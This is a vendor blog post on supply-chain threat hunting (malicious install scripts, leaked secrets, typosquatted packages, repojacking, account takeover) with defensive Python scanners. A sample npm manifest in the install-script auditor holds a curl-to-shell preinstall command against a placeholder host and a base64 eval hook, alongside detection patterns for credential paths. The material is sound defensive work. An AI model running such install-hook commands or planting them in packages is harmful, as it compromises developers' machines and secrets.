
Threat Hunting 101: Five Common Threats to Look For


The software supply chain is increasingly complex, giving threat actors more opportunities to find ways into your system, either via custom code or third-party code. 

In this blog we’ll briefly go over five supply chain threats and where to find them. For a deeper look at finding these threats, with more specifics and tool suggestions, check out our threat hunting guide.

Installation scripts

What it is: 

After gaining access to the distribution network of software vendors or package managers, attackers can inject malicious code into the installation scripts of otherwise legitimate packages. 

Where to look: 

Malicious installation scripts run on the developer machine, where they typically target personal and company data including credentials, or in the build process, where they will usually attempt to establish a backdoor and persistence.
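As an added illustration (not code from this post or from Mend), here is a small audit of the hooks that npm runs automatically during install. The indicator patterns and the sample manifest are constructed for this example; a real hunt would tune the indicator list to the ecosystem and the organisation's own install conventions.

```python
"""Added example: flag risky npm lifecycle scripts in a package.json.

Indicator patterns and the sample manifest are constructed for illustration.
"""
import json
import re

# Hooks that npm runs automatically during `npm install`, so any command here
# executes on every developer machine and build agent that installs the package.
LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Constructed indicator list: behaviours that are rare in legitimate install
# hooks but typical of hostile ones.
SUSPICIOUS_PATTERNS = {
    "pipe_to_shell": re.compile(r"\b(curl|wget)\b[^|]*\|\s*(ba|z)?sh\b"),
    "base64_decode": re.compile(
        r"base64\s+(-d|--decode)|from\(['\"][A-Za-z0-9+/=]{20,}['\"],\s*['\"]base64"
    ),
    "inline_eval": re.compile(r"\beval\(|\bnode\s+-e\b"),
    "credential_paths": re.compile(r"\.npmrc|\.ssh/|\.aws/|\.git-credentials"),
}


def audit_package_json(text: str) -> list[dict]:
    """Return one finding per lifecycle hook whose command matches an indicator.

    Only lifecycle hooks are inspected: a `test` script that uses eval() is
    noise for this purpose because `npm install` never runs it.
    """
    scripts = json.loads(text).get("scripts", {})
    findings = []
    for hook in LIFECYCLE_HOOKS:
        cmd = scripts.get(hook)
        if not cmd:
            continue
        hits = [name for name, rx in SUSPICIOUS_PATTERNS.items() if rx.search(cmd)]
        if hits:
            findings.append({"hook": hook, "command": cmd, "indicators": hits})
    return findings


# Constructed sample manifest: two hostile hooks, one benign hook ("husky install"
# is a common legitimate prepare step) and a non-lifecycle "test" script.
SAMPLE_MANIFEST = {
    "name": "example-widget",
    "version": "1.0.0",
    "scripts": {
        "preinstall": "curl -s https://example.invalid/setup.sh | sh",
        "postinstall": "node -e 'eval(Buffer.from(\"aGVsbG8gd29ybGQgdGhpcyBpcyBhIHRlc3Q=\",\"base64\").toString())'",
        "prepare": "husky install",
        "test": "node -e 'console.log(1)'",
    },
}


def audit_sample() -> list[dict]:
    """Run the audit over the constructed manifest."""
    return audit_package_json(json.dumps(SAMPLE_MANIFEST))


if __name__ == "__main__":
    for finding in audit_sample():
        print(f"{finding['hook']}: {finding['indicators']} -> {finding['command']}")
```

The same idea carries over to other ecosystems (setup.py / pyproject build hooks for Python, Maven plugins that run during the build): the question is always which commands run unattended at install or build time, and whether they download, decode or read anything they have no reason to.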

Secrets Leak

What it is: 

Secrets include API keys, passwords, and other types of credentials and confidential information that should be kept away from bad actors. They can be easily left behind in the development process, and it’s worth the effort to find them before your adversaries do.

Where to look:

While secrets can be anywhere in your code, they are often found in configuration files. Looking for secrets manually is a tough job. Tools exist to search your entire code base for you.
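To show what "search your entire code base" looks like at its simplest, here is an added example of a pattern-plus-entropy secrets scanner (written for this post, not Mend's tooling). The detection patterns, the placeholder list and the sample configuration are constructed; the AWS access key ID in the sample is the documented example value, not a live credential.

```python
"""Added example: a small secrets scanner for configuration files.

Patterns, placeholder list and sample config are constructed for illustration.
"""
import math
import re
from collections import Counter

# Constructed pattern set: well-known key formats plus generic assignments.
PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "private_key_block": re.compile(r"-----BEGIN (?:RSA |EC |OPENSSH )?PRIVATE KEY-----"),
    "assigned_password": re.compile(r"(?i)\b(password|passwd|pwd)\s*[=:]\s*['\"]?([^'\"\s]+)"),
    "generic_token": re.compile(
        r"(?i)\b(api[_-]?key|secret|token)\s*[=:]\s*['\"]?([A-Za-z0-9_\-/+=]{16,})"
    ),
}
# Values that look like secrets but are obviously placeholders.
PLACEHOLDERS = {"changeme", "<redacted>", "xxxxxxxx", "password"}
# Generic tokens below this Shannon entropy (bits per character) are skipped,
# which removes repeated filler such as "aaaaaaaaaaaaaaaaaaaa".
MIN_TOKEN_ENTROPY = 3.0


def shannon_entropy(value: str) -> float:
    """Bits of entropy per character, estimated from character frequencies."""
    if not value:
        return 0.0
    n = len(value)
    return -sum(c / n * math.log2(c / n) for c in Counter(value).values())


def scan_lines(lines) -> list[tuple[int, str, str]]:
    """Return (line number, pattern name, matched value) for each suspected secret."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        for name, rx in PATTERNS.items():
            m = rx.search(line)
            if not m:
                continue
            value = m.group(m.lastindex) if m.lastindex else m.group(0)
            # Interpolated values such as ${DB_PASSWORD} are references, not secrets.
            if value.lower() in PLACEHOLDERS or value.startswith("${"):
                continue
            if name == "generic_token" and shannon_entropy(value) < MIN_TOKEN_ENTROPY:
                continue
            findings.append((lineno, name, value))
    return findings


# Constructed sample: an INI-style file mixing safe references with leaked values.
SAMPLE_CONFIG = """\
[database]
host = db.internal.example
password = ${DB_PASSWORD}
[legacy]
password = hunter2-prod-2019
[aws]
aws_access_key_id = AKIAIOSFODNN7EXAMPLE
[api]
api_key = "dGhpcyBpcyBub3QgYSByZWFsIGtleQ"
token = aaaaaaaaaaaaaaaaaaaa
[tls]
key = -----BEGIN RSA PRIVATE KEY-----
"""


def scan_sample() -> list[tuple[int, str, str]]:
    """Scan the constructed sample configuration."""
    return scan_lines(SAMPLE_CONFIG.splitlines())


if __name__ == "__main__":
    for lineno, name, value in scan_sample():
        print(f"line {lineno}: {name}: {value}")
```

Two design points worth noting: the `${...}` and placeholder filters are what keep a scanner like this from drowning developers in false positives, and the entropy threshold only applies to the generic assignment pattern, because a fixed-format key such as an AWS access key ID is identifiable without it.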

Malicious Artifacts

What it is:

Malicious artifacts are published to the public registries that developers rely on for downloading libraries and applications in their programming language. Bad actors use techniques like typosquatting and brandjacking to make their malicious packages look like legitimate ones and trick unsuspecting developers into installing them. You can learn more about malicious packages here.

Where to look:

Malicious artifacts sit in public registries like npm, PyPI, and Maven Central. A good SCA tool that detects malicious packages (we like Mend SCA, of course) can stop developers from adding these packages in the first place or find the packages that have already slipped through the cracks.
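The typosquatting half of this is simple enough to show in code. The added example below (not Mend's detector, and not from the original post) reads a Python requirements file, normalizes each name the way PyPI does, and flags any name that is not a known popular package but sits within one edit (including a transposition) of one. The "popular packages" set is a short constructed subset; a real check would take it from registry download statistics.

```python
"""Added example: typosquat check for a requirements.txt.

POPULAR is a constructed subset for illustration.
"""
import re

# Constructed subset of widely downloaded packages; a real list would be much longer.
POPULAR = {"requests", "numpy", "pandas", "urllib3", "python-dateutil", "cryptography", "boto3"}
MAX_DISTANCE = 1


def normalize(name: str) -> str:
    """PEP 503 name normalization: case-insensitive, runs of -_. collapse to '-'."""
    return re.sub(r"[-_.]+", "-", name).lower()


def osa_distance(a: str, b: str) -> int:
    """Optimal string alignment distance: edits plus adjacent transpositions,
    so 'reqeusts' is one step from 'requests' rather than two."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[len(a)][len(b)]


def parse_requirement_names(text: str) -> list[str]:
    """Extract bare package names, dropping version specifiers, extras and markers."""
    names = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or line.startswith("-"):
            continue
        names.append(re.split(r"[\s=<>!~;\[]", line, maxsplit=1)[0])
    return names


def find_typosquats(text: str) -> list[tuple[str, str]]:
    """Return (declared name, popular name it resembles) for each suspect."""
    known = {normalize(p) for p in POPULAR}
    suspects = []
    for name in parse_requirement_names(text):
        norm = normalize(name)
        if norm in known:
            continue  # exact match with a popular package is the expected case
        closest = min(known, key=lambda k: osa_distance(norm, k))
        if osa_distance(norm, closest) <= MAX_DISTANCE:
            suspects.append((name, closest))
    return suspects


# Constructed manifest: two look-alike names among legitimate ones.
SAMPLE_REQUIREMENTS = """\
# constructed sample
requests==2.31.0
reqeusts>=2.0
numpy
nunpy==1.26
python_dateutil>=2.8
Cryptography
"""


def check_sample() -> list[tuple[str, str]]:
    """Run the check over the constructed manifest."""
    return find_typosquats(SAMPLE_REQUIREMENTS)


if __name__ == "__main__":
    for declared, target in check_sample():
        print(f"{declared!r} looks like {target!r}")
```

Note that `python_dateutil` and `Cryptography` are not flagged: normalization maps them onto their real names, which is exactly how pip treats them. Brandjacking (a plausible new name that borrows a trusted brand) is not caught by edit distance and needs registry metadata and maintainer history instead, which is where a dedicated SCA tool earns its keep.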

Repojacking

What it is: 

Through rebranding and acquisitions, it is common for repository names to change. When that happens, threat actors can create new repositories with the old names and their malicious code. Now any project that dynamically links to the original repository is at risk.

Where to look:

Repojacking occurs on code-hosting platforms like GitHub, Bitbucket, or GitLab. Hunting these threats must be done by repository owners who should audit any changed or deleted names for new activity.
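From the consumer side, the exposure to repojacking comes from dependencies that are fetched straight from a code-hosting platform by repository name. The added example below (written for this post, not the project's or Mend's code) lists such dependencies in a requirements file, checks whether each one is pinned to a full commit hash rather than a branch or tag, and cross-references a constructed `KNOWN_RENAMES` map of repositories the organisation knows have moved.

```python
"""Added example: find VCS dependencies that reference repositories by name
and check whether they are pinned to an immutable commit.

KNOWN_RENAMES and the sample requirements are constructed for illustration.
"""
import re

# pip-style VCS requirement: git+https://<host>/<owner>/<repo>[.git][@<ref>][#egg=...]
VCS_REF = re.compile(
    r"git\+https?://(github\.com|gitlab\.com|bitbucket\.org)/([^/\s]+)/([^/@#\s]+)(?:@([^#\s]+))?"
)
COMMIT_HASH = re.compile(r"[0-9a-f]{40}")

# Constructed: repositories this organisation's teams know were renamed or moved.
# The old name is the one a repojacker would try to re-register.
KNOWN_RENAMES = {"old-org/widgets": "new-org/widgets"}


def audit_vcs_dependencies(text: str) -> list[dict]:
    """Return the VCS dependencies that are unpinned or point at a renamed repo."""
    findings = []
    for line in text.splitlines():
        m = VCS_REF.search(line)
        if not m:
            continue
        host, owner, repo, ref = m.groups()
        repo = repo[:-4] if repo.endswith(".git") else repo
        full = f"{owner}/{repo}"
        issues = []
        # A branch or tag can be repointed by whoever controls the repository
        # name; a full commit hash cannot be satisfied by substituted code.
        if ref is None or not COMMIT_HASH.fullmatch(ref):
            issues.append("unpinned_ref")
        if full in KNOWN_RENAMES:
            issues.append("references_renamed_repo")
        if issues:
            findings.append({"host": host, "repo": full, "ref": ref, "issues": issues})
    return findings


# Constructed requirements: one renamed and unpinned, one hash-pinned, one tag-pinned.
SAMPLE_REQUIREMENTS = """\
requests==2.31.0
git+https://github.com/old-org/widgets.git@main#egg=widgets
git+https://gitlab.com/acme/tooling.git@0123456789abcdef0123456789abcdef01234567#egg=tooling
git+https://bitbucket.org/acme/legacy-lib.git@v1.2#egg=legacy-lib
"""


def audit_sample() -> list[dict]:
    """Run the audit over the constructed requirements."""
    return audit_vcs_dependencies(SAMPLE_REQUIREMENTS)


if __name__ == "__main__":
    for finding in audit_sample():
        print(f"{finding['repo']} ({finding['host']}) ref={finding['ref']}: {finding['issues']}")
```

The hash-pinned `acme/tooling` dependency produces no finding: even if that name were later re-registered, a fetch of the pinned commit could not be satisfied by different code. The list this produces is also the list a repository owner should be checking on the platform side for "changed or deleted names with new activity".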

Account Takeover

What it is:

Through phishing attacks, weak passwords, stolen credentials, and social engineering, attackers can gain access to the accounts of repository owners and inject malicious code into widely used projects.

Where to look:

Monitor your account for irregular login activity and monitor your repository for suspicious patterns. Look at your security settings for your code hosting platform accounts (like GitHub, Bitbucket, or GitLab) as well as your email or any other services that are connected to make sure they are fortified.
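"Irregular login activity" is vague until you decide what irregular means. The added example below (not from the original post and not any platform's built-in alerting) runs three simple checks over constructed login audit records: a successful login preceded by a burst of failures, a successful login from a country the account has never logged in from before, and a successful login that did not use MFA. The record format, thresholds and sample events are all assumptions for this illustration.

```python
"""Added example: flag account-takeover signals in login audit records.

Record format (constructed): timestamp,user,ip,country,result,mfa
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Constructed thresholds: three or more failures in the ten minutes before a success.
FAILURE_THRESHOLD = 3
FAILURE_WINDOW = timedelta(minutes=10)


def parse_record(line: str) -> dict:
    """Parse one comma-separated audit record."""
    ts, user, ip, country, result, mfa = line.split(",")
    return {
        "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
        "user": user,
        "ip": ip,
        "country": country,
        "result": result,
        "mfa": mfa == "yes",
    }


def detect_takeover_signals(lines) -> list[dict]:
    """Return one alert per successful login that trips at least one check.

    The country baseline is learned from earlier successful logins in the same
    stream, so a user's first login never counts as "new country".
    """
    seen_countries = defaultdict(set)
    recent_failures = defaultdict(deque)
    alerts = []
    for line in lines:
        if not line.strip():
            continue
        ev = parse_record(line)
        user = ev["user"]
        fails = recent_failures[user]
        while fails and ev["ts"] - fails[0] > FAILURE_WINDOW:
            fails.popleft()  # drop failures outside the window
        if ev["result"] == "failure":
            fails.append(ev["ts"])
            continue
        reasons = []
        if len(fails) >= FAILURE_THRESHOLD:
            reasons.append("success_after_failures")
        if seen_countries[user] and ev["country"] not in seen_countries[user]:
            reasons.append("new_country")
        if not ev["mfa"]:
            reasons.append("no_mfa")
        seen_countries[user].add(ev["country"])
        fails.clear()
        if reasons:
            alerts.append({"user": user, "ts": ev["ts"].isoformat(), "ip": ev["ip"], "reasons": reasons})
    return alerts


# Constructed audit log using documentation IP ranges; bob is routine,
# alice shows a failure burst followed by a non-MFA success from a new country.
SAMPLE_LOG = """\
2024-05-01T08:00:00Z,alice,198.51.100.4,DE,success,yes
2024-05-01T08:05:00Z,bob,203.0.113.9,US,success,yes
2024-05-01T23:10:00Z,alice,203.0.113.77,BR,failure,no
2024-05-01T23:10:20Z,alice,203.0.113.77,BR,failure,no
2024-05-01T23:10:40Z,alice,203.0.113.77,BR,failure,no
2024-05-01T23:11:00Z,alice,203.0.113.77,BR,success,no
2024-05-02T09:00:00Z,bob,203.0.113.9,US,success,yes
"""


def detect_sample() -> list[dict]:
    """Run the checks over the constructed log."""
    return detect_takeover_signals(SAMPLE_LOG.splitlines())


if __name__ == "__main__":
    for alert in detect_sample():
        print(f"{alert['ts']} {alert['user']} from {alert['ip']}: {alert['reasons']}")
```

Each check on its own is noisy (people travel, MFA rollouts are gradual), which is why the alert carries all the reasons that fired together: a success that is new-country, post-failure-burst and MFA-less at once is a much stronger signal than any one of them, and the same logic applies to the audit logs of the email and other connected services the paragraph above mentions.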

If you’re not a repo owner but are still in the line of fire because your project requires open source packages that are at risk of repojacking or account takeover, you can protect yourself. Regularly scan your project with an SCA tool and educate your developers on best practices in open source code security.

Learn more about common supply chain threats and how to stop them.

Meet The Author

AJ Starita

AJ Starita is fascinated by the challenges and triumphs of cybersecurity and open source software. When not writing about technology, AJ can usually be found exploring nature or reading detective novels.
